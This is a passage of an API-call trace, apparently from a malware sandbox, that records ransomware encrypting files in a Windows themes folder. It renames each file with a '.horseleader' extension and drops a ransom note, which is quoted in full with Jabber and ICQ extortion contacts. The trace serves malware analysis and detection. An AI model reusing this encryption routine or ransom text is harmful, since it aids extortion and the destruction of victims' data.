(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.254] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*") returned 69 [0247.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.256] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\.") returned 69 [0247.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.256] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.256] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\..") returned 70 [0247.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8239a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xba32, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="JOURNAL.ELM", cAlternateFileName="")) returned 1 [0247.257] lstrcmpiW (lpString1="JOURNAL.ELM", lpString2="Windows") returned -1 [0247.257] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM") returned 79 [0247.257] StrStrIW (lpFirst="JOURNAL.ELM", lpSrch=".horseleader") returned 0x0 [0247.257] lstrcmpW (lpString1="JOURNAL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.257] lstrcmpW (lpString1="JOURNAL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.257] lstrlenW (lpString=".testttjffg") returned 11 [0247.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.270] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM") returned 79 [0247.270] StrStrW (lpFirst="JOURNAL.ELM", lpSrch=".txt") returned 0x0 [0247.270] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47666) returned 1 [0247.270] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.272] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.273] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.273] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.274] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.274] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.274] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a32, lpOverlapped=0x0) returned 1 [0247.274] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe5ce, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.274] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a32, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a32, lpOverlapped=0x0) returned 1 [0247.275] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.275] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.275] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.275] CloseHandle (hObject=0x1a4) returned 1 [0247.275] GetProcessHeap () returned 0x780000 [0247.275] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.276] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM.horseleader") returned 91 [0247.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm.horseleader")) returned 1 [0247.277] GetProcessHeap () returned 0x780000 [0247.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.277] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x567e4730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="JOURNAL.INF", cAlternateFileName="")) returned 1 [0247.277] lstrcmpiW (lpString1="JOURNAL.INF", lpString2="Windows") returned -1 [0247.277] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0247.277] StrStrIW (lpFirst="JOURNAL.INF", lpSrch=".horseleader") returned 0x0 [0247.277] lstrcmpW (lpString1="JOURNAL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.277] lstrcmpW (lpString1="JOURNAL.INF", lpString2="_uninstalling_.png") returned 1 [0247.278] lstrlenW (lpString=".testttjffg") returned 11 [0247.278] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF", lpSrch=".testttjffg") returned 0x0 [0247.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0247.279] StrStrW (lpFirst="JOURNAL.INF", lpSrch=".txt") returned 0x0 [0247.279] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=499) returned 1 [0247.279] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f3, lpOverlapped=0x0) returned 1 [0247.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.280] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f3, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f3, lpOverlapped=0x0) returned 1 [0247.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.281] CloseHandle (hObject=0x1a4) returned 1 [0247.281] GetProcessHeap () returned 0x780000 [0247.281] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.281] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.horseleader") returned 91 [0247.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf.horseleader")) returned 1 [0247.284] GetProcessHeap () returned 0x780000 [0247.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.285] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.285] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.285] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0247.285] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.285] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.285] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.285] lstrlenW (lpString=".testttjffg") returned 11 [0247.285] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.285] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.285] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.286] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0247.286] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.286] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1232) returned 1 [0247.286] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4d0, lpOverlapped=0x0) returned 1 [0247.288] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffb30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4d0, lpOverlapped=0x0) returned 1 [0247.288] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.289] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.289] CloseHandle (hObject=0x1a4) returned 1 [0247.289] GetProcessHeap () returned 0x780000 [0247.289] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.289] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.horseleader") returned 91 [0247.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.horseleader")) returned 1 [0247.290] GetProcessHeap () returned 0x780000 [0247.290] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.290] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47ed, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.290] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.290] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0247.290] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0247.290] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.290] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.290] lstrlenW (lpString=".testttjffg") returned 11 [0247.290] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.290] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.291] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0247.291] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.291] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18413) returned 1 [0247.291] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x47ed, lpOverlapped=0x0) returned 1 [0247.293] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb813, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.294] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x47ed, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x47ed, lpOverlapped=0x0) returned 1 [0247.294] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.294] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.294] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.294] CloseHandle (hObject=0x1a4) returned 1 [0247.294] GetProcessHeap () returned 0x780000 [0247.295] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.295] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.horseleader") returned 92 [0247.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.horseleader")) returned 1 [0247.296] GetProcessHeap () returned 0x780000 [0247.296] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.296] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47ed, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.296] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.296] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\#Decrypt#.txt") returned 81 [0247.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.297] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.297] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.298] lstrlenA (lpString="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") returned 1368 [0247.298] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.298] CloseHandle (hObject=0x158) returned 1 [0247.298] GetProcessHeap () returned 0x780000 [0247.298] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.299] FindNextFileW (in: hFindFile=0x7c6860, 